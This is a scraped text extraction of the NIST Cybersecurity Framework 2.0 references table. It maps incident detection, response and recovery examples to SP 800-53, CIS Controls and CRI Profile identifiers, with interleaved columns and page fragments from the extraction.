CSF 2.0 Page 135 of 145

Ex1: Securely provide cyber threat CRI Profile v2.0: DE.AE-07
intelligence feeds to detection CRI Profile v2.0: DE.AE-07.01
technologies, processes, and personnel CRI Profile v2.0: DE.AE-07.02
Ex2: Securely provide information from CSF v1.1: DE.AE-3
asset inventories to detection technologies, SP 800-53 Rev 5.1.1: PM-16
processes, and personnel SP 800-53 Rev 5.1.1: RA-03
Ex3: Rapidly acquire and analyze SP 800-53 Rev 5.1.1: RA-10
vulnerability disclosures for the
organization's technologies from suppliers,
vendors, and third-party security advisories
Ex1: Apply incident criteria to known and CRI Profile v2.0: DE.AE-08
assumed characteristics of activity in order CRI Profile v2.0: DE.AE-08.01
to determine whether an incident should CSF v1.1: DE.AE-5
be declared SP 800-53 Rev 5.1.1: IR-04
Ex2: Take known false positives into SP 800-53 Rev 5.1.1: IR-08
account when applying incident criteria
CRI Profile v2.0: RS

CSF v1.1: RS
CRI Profile v2.0: RS.MA

CSF v1.1: RS.RP
SP 800-53 Rev 5.1.1: IR-04
SP 800-53 Rev 5.1.1: IR-07
SP 800-53 Rev 5.1.1: IR-08
SP 800-53 Rev 5.1.1: IR-09
CSF 2.0 Page 136 of 145

Ex1: Detection technologies automatically CIS Controls v8.0: 17.4
report confirmed incidents CRI Profile v2.0: RS.MA-01
Ex2: Request incident response assistance CRI Profile v2.0: RS.MA-01.01
from the organization's incident response CSF v1.1: RS.RP-1
outsourcer CSF v1.1: RS.CO-4
Ex3: Designate an incident lead for each SP 800-53 Rev 5.1.1: IR-06
incident SP 800-53 Rev 5.1.1: IR-07
Ex4: Initiate execution of additional SP 800-53 Rev 5.1.1: IR-08
cybersecurity plans as needed to support SP 800-53 Rev 5.1.1: SR-03
incident response (for example, business SP 800-53 Rev 5.1.1: SR-08
continuity and disaster recovery)
Ex1: Preliminarily review incident reports to CRI Profile v2.0: RS.MA-02

confirm that they are cybersecurity-related CRI Profile v2.0: RS.MA-02.01
and necessitate incident response activities CSF v1.1: RS.AN-1
Ex2: Apply criteria to estimate the severity CSF v1.1: RS.AN-2
of an incident SP 800-53 Rev 5.1.1: IR-04
SP 800-53 Rev 5.1.1: IR-05
SP 800-53 Rev 5.1.1: IR-06
Ex1: Further review and categorize CRI Profile v2.0: RS.MA-03

incidents based on the type of incident CRI Profile v2.0: RS.MA-03.01
(e.g., data breach, ransomware, DDoS, CSF v1.1: RS.AN-4
account compromise) CSF v1.1: RS.AN-2
Ex2: Prioritize incidents based on their SP 800-53 Rev 5.1.1: IR-04
scope, likely impact, and time-critical SP 800-53 Rev 5.1.1: IR-05
nature SP 800-53 Rev 5.1.1: IR-06
Ex3: Select incident response strategies for
active incidents by balancing the need to
quickly recover from an incident with the
need to observe the attacker or conduct a
more thorough investigation
CSF 2.0 Page 137 of 145

Ex1: Track and validate the status of all CRI Profile v2.0: RS.MA-04
ongoing incidents CRI Profile v2.0: RS.MA-04.01
Ex2: Coordinate incident escalation or CSF v1.1: RS.AN-2
elevation with designated internal and CSF v1.1: RS.CO-4
external stakeholders SP 800-53 Rev 5.1.1: IR-04
SP 800-53 Rev 5.1.1: IR-05
SP 800-53 Rev 5.1.1: IR-06
SP 800-53 Rev 5.1.1: IR-07
Ex1: Apply incident recovery criteria to CIS Controls v8.0: 17.9

known and assumed characteristics of the CRI Profile v2.0: RS.MA-05
incident to determine whether incident CRI Profile v2.0: RS.MA-05.01
recovery processes should be initiated SP 800-53 Rev 5.1.1: IR-04
Ex2: Take the possible operational SP 800-53 Rev 5.1.1: IR-08
disruption of incident recovery activities
into account
CRI Profile v2.0: RS.AN

CSF v1.1: RS.AN
Ex1: Determine the sequence of events that CIS Controls v8.0: 17.8
occurred during the incident and which CRI Profile v2.0: RS.AN-03
assets and resources were involved in each CRI Profile v2.0: RS.AN-03.01
event CSF v1.1: RS.AN-3
Ex2: Attempt to determine what SP 800-53 Rev 5.1.1: AU-07
vulnerabilities, threats, and threat actors SP 800-53 Rev 5.1.1: IR-04
were directly or indirectly involved in the
incident
Ex3: Analyze the incident to find the
underlying, systemic root causes
Ex4: Check any cyber deception technology
for additional information on attacker
behavior
CSF 2.0 Page 138 of 145

Ex1: Require each incident responder and CRI Profile v2.0: RS.AN-06
others (e.g., system administrators, CRI Profile v2.0: RS.AN-06.01
cybersecurity engineers) who perform CSF v1.1: RS.AN-3
incident response tasks to record their SP 800-53 Rev 5.1.1: AU-07
actions and make the record immutable SP 800-53 Rev 5.1.1: IR-04
Ex2: Require the incident lead to document SP 800-53 Rev 5.1.1: IR-06
the incident in detail and be responsible for
preserving the integrity of the
documentation and the sources of all
information being reported
Ex1: Collect, preserve, and safeguard the CRI Profile v2.0: RS.AN-07
integrity of all pertinent incident data and CRI Profile v2.0: RS.AN-07.01
metadata (e.g., data source, date/time of SP 800-53 Rev 5.1.1: AU-07
collection) based on evidence preservation SP 800-53 Rev 5.1.1: IR-04
and chain-of-custody procedures SP 800-53 Rev 5.1.1: IR-06
Ex1: Review other potential targets of the CRI Profile v2.0: RS.AN-08
incident to search for indicators of CRI Profile v2.0: RS.AN-08.01
compromise and evidence of persistence SP 800-53 Rev 5.1.1: IR-04
Ex2: Automatically run tools on targets to SP 800-53 Rev 5.1.1: IR-08
look for indicators of compromise and SP 800-53 Rev 5.1.1: RA-03
evidence of persistence SP 800-53 Rev 5.1.1: RA-07
CRI Profile v2.0: RS.CO

CSF v1.1: RS.CO
CSF 2.0 Page 139 of 145

Ex1: Follow the organization's breach CIS Controls v8.0: 17.2
notification procedures after discovering a CRI Profile v2.0: RS.CO-02
data breach incident, including notifying CRI Profile v2.0: RS.CO-02.01
affected customers CRI Profile v2.0: RS.CO-02.02
Ex2: Notify business partners and CRI Profile v2.0: RS.CO-02.03
customers of incidents in accordance with CSF v1.1: RS.CO-2
contractual requirements CSF v1.1: RS.CO-3
Ex3: Notify law enforcement agencies and SP 800-53 Rev 5.1.1: IR-04
regulatory bodies of incidents based on SP 800-53 Rev 5.1.1: IR-06
criteria in the incident response plan and SP 800-53 Rev 5.1.1: IR-07
management approval SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-08
Ex1: Securely share information consistent CIS Controls v8.0: 17.2

with response plans and information CRI Profile v2.0: RS.CO-03
sharing agreements CRI Profile v2.0: RS.CO-03.01
Ex2: Voluntarily share information about an CRI Profile v2.0: RS.CO-03.02
attacker's observed TTPs, with all sensitive CSF v1.1: RS.CO-3
data removed, with an Information Sharing CSF v1.1: RS.CO-5
and Analysis Center (ISAC) SP 800-53 Rev 5.1.1: IR-04
Ex3: Notify HR when malicious insider SP 800-53 Rev 5.1.1: IR-06
activity occurs SP 800-53 Rev 5.1.1: IR-07
Ex4: Regularly update senior leadership on SP 800-53 Rev 5.1.1: SR-03
the status of major incidents SP 800-53 Rev 5.1.1: SR-08
Ex5: Follow the rules and protocols defined
in contracts for incident information sharing
between the organization and its suppliers
Ex6: Coordinate crisis communication
methods between the organization and its
critical suppliers
CSF 2.0 Page 140 of 145

CRI Profile v2.0: RS.MI
CSF v1.1: RS.MI
Ex1: Cybersecurity technologies (e.g., CRI Profile v2.0: RS.MI-01

antivirus software) and cybersecurity CRI Profile v2.0: RS.MI-01.01
features of other technologies (e.g., CSF v1.1: RS.MI-1
operating systems, network infrastructure SP 800-53 Rev 5.1.1: IR-04
devices) automatically perform
containment actions
Ex2: Allow incident responders to manually
select and perform containment actions
Ex3: Allow a third party (e.g., internet
service provider, managed security service
provider) to perform containment actions
on behalf of the organization
Ex4: Automatically transfer compromised
endpoints to a remediation virtual local
area network (VLAN)
CSF 2.0 Page 141 of 145

Ex1: Cybersecurity technologies and CRI Profile v2.0: RS.MI-02
cybersecurity features of other CRI Profile v2.0: RS.MI-02.01
technologies (e.g., operating systems, CSF v1.1: RS.MI-2
network infrastructure devices) SP 800-53 Rev 5.1.1: IR-04
automatically perform eradication actions
Ex2: Allow incident responders to manually
select and perform eradication actions
Ex3: Allow a third party (e.g., managed
security service provider) to perform
eradication actions on behalf of the
organization
CRI Profile v2.0: RC

CSF v1.1: RC
CRI Profile v2.0: RC.RP

CSF v1.1: RC.RP
SP 800-53 Rev 5.1.1: CP-04
SP 800-53 Rev 5.1.1: CP-10
Ex1: Begin recovery procedures during or CRI Profile v2.0: RC.RP-01

after incident response processes CRI Profile v2.0: RC.RP-01.01
Ex2: Make all individuals with recovery CSF v1.1: RC.RP-1
responsibilities aware of the plans for SP 800-53 Rev 5.1.1: CP-10
recovery and the authorizations required to SP 800-53 Rev 5.1.1: IR-04
implement each aspect of the plans SP 800-53 Rev 5.1.1: IR-08
CSF 2.0 Page 142 of 145

Ex1: Select recovery actions based on the CRI Profile v2.0: RC.RP-02
criteria defined in the incident response CRI Profile v2.0: RC.RP-02.01
plan and available resources CRI Profile v2.0: RC.RP-02.02
Ex2: Change planned recovery actions CSF v1.1: RC.RP-1
based on a reassessment of organizational SP 800-53 Rev 5.1.1: CP-10
needs and resources SP 800-53 Rev 5.1.1: IR-04
SP 800-53 Rev 5.1.1: IR-08
Ex1: Check restoration assets for indicators CIS Controls v8.0: 11.5
of compromise, file corruption, and other CRI Profile v2.0: RC.RP-03
integrity issues before use CRI Profile v2.0: RC.RP-03.01
SP 800-53 Rev 5.1.1: CP-02
SP 800-53 Rev 5.1.1: CP-04
SP 800-53 Rev 5.1.1: CP-09
Ex1: Use business impact and system CRI Profile v2.0: RC.RP-04
categorization records (including service CRI Profile v2.0: RC.RP-04.01
delivery objectives) to validate that SP 800-53 Rev 5.1.1: PM-08
essential services are restored in the SP 800-53 Rev 5.1.1: PM-09
appropriate order SP 800-53 Rev 5.1.1: PM-11
Ex2: Work with system owners to confirm SP 800-53 Rev 5.1.1: IR-01
the successful restoration of systems and SP 800-53 Rev 5.1.1: IR-08
the return to normal operations
Ex3: Monitor the performance of restored
systems to verify the adequacy of the
restoration
Ex1: Check restored assets for indicators of CRI Profile v2.0: RC.RP-05
compromise and remediation of root CRI Profile v2.0: RC.RP-05.01
causes of the incident before production CRI Profile v2.0: RC.RP-05.02
use SP 800-53 Rev 5.1.1: CP-10
Ex2: Verify the correctness and adequacy of
the restoration actions taken before putting
a restored system online
CSF 2.0 Page 143 of 145

Ex1: Prepare an after-action report that CRI Profile v2.0: RC.RP-06
documents the incident itself, the response CRI Profile v2.0: RC.RP-06.01
and recovery actions taken, and lessons SP 800-53 Rev 5.1.1: IR-04
learned SP 800-53 Rev 5.1.1: IR-08
Ex2: Declare the end of incident recovery
once the criteria are met
CRI Profile v2.0: RC.CO

CSF v1.1: RC.CO
Ex1: Securely share recovery information, CRI Profile v2.0: RC.CO-03

including restoration progress, consistent CRI Profile v2.0: RC.CO-03.01
with response plans and information CRI Profile v2.0: RC.CO-03.02
sharing agreements CSF v1.1: RC.CO-3
Ex2: Regularly update senior leadership on SP 800-221A: GV.CO-1
recovery status and restoration progress for SP 800-53 Rev 5.1.1: IR-04
major incidents SP 800-53 Rev 5.1.1: IR-06
Ex3: Follow the rules and protocols defined SP 800-53 Rev 5.1.1: SR-08
in contracts for incident information sharing
between the organization and its suppliers
Ex4: Coordinate crisis communication
between the organization and its critical
suppliers
CSF 2.0 Page 144 of 145

Ex1: Follow the organization's breach CIS Controls v8.0: 17.2
notification procedures for recovering from CIS Controls v8.0: 17.6
a data breach incident CRI Profile v2.0: RC.CO-04
Ex2: Explain the steps being taken to CRI Profile v2.0: RC.CO-04.01
recover from the incident and to prevent a CSF v1.1: RC.CO-1
recurrence CSF v1.1: RS.CO-2
SP 800-221A: GV.CO-1
SP 800-53 Rev 5.1.1: CP-02
SP 800-53 Rev 5.1.1: IR-04
CSF 2.0 Page 145 of 145

csf2 References

Uploaded by

Copyright:

Available Formats

You might also like

csf2 References

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

csf2 References

Uploaded by

Copyright:

Available Formats

NIST Cybersecurity Framework (CSF) 2.

Title The NIST Cybersecurity Framework (CSF) 2.0

Change Log Final

Function Category Subcategory

Organizational Context (GV.OC): The

GV.OC-01: The organizational mission is

CSF 2.0 Page 2 of 145

CSF 2.0 Page 3 of 145

CSF 2.0 Page 4 of 145

GV.OC-05: Outcomes, capabilities, and services

CSF 2.0 Page 5 of 145

GV.RM-01: Risk management objectives are

GV.RM-02: Risk appetite and risk tolerance

CSF 2.0 Page 6 of 145

GV.RM-04: Strategic direction that describes

CSF 2.0 Page 7 of 145

GV.RM-06: A standardized method for

CSF 2.0 Page 8 of 145

Roles, Responsibilities, and Authorities

CSF 2.0 Page 9 of 145

CSF 2.0 Page 10 of 145

CSF 2.0 Page 11 of 145

GV.RR-04: Cybersecurity is included in human

Policy (GV.PO): Organizational

CSF 2.0 Page 12 of 145

CSF 2.0 Page 13 of 145

Oversight (GV.OV): Results of organization-

CSF 2.0 Page 14 of 145

CSF 2.0 Page 15 of 145

GV.OV-03: Organizational cybersecurity risk

Cybersecurity Supply Chain Risk

CSF 2.0 Page 16 of 145

CSF 2.0 Page 17 of 145

CSF 2.0 Page 18 of 145

CSF 2.0 Page 19 of 145

CSF 2.0 Page 20 of 145

CSF 2.0 Page 21 of 145

CSF 2.0 Page 22 of 145

CSF 2.0 Page 23 of 145

CSF 2.0 Page 24 of 145

CSF 2.0 Page 25 of 145

CSF 2.0 Page 26 of 145

ID.AM-01: Inventories of hardware managed by

ID.AM-02: Inventories of software, services, and

CSF 2.0 Page 27 of 145

ID.AM-04: Inventories of services provided by

CSF 2.0 Page 28 of 145

ID.AM-07: Inventories of data and

CSF 2.0 Page 29 of 145

Risk Assessment (ID.RA): The cybersecurity

CSF 2.0 Page 30 of 145

ID.RA-02: Cyber threat intelligence is received

CSF 2.0 Page 31 of 145

ID.RA-04: Potential impacts and likelihoods of

CSF 2.0 Page 32 of 145

ID.RA-06: Risk responses are chosen, prioritized,

CSF 2.0 Page 33 of 145

ID.RA-08: Processes for receiving, analyzing, and

CSF 2.0 Page 34 of 145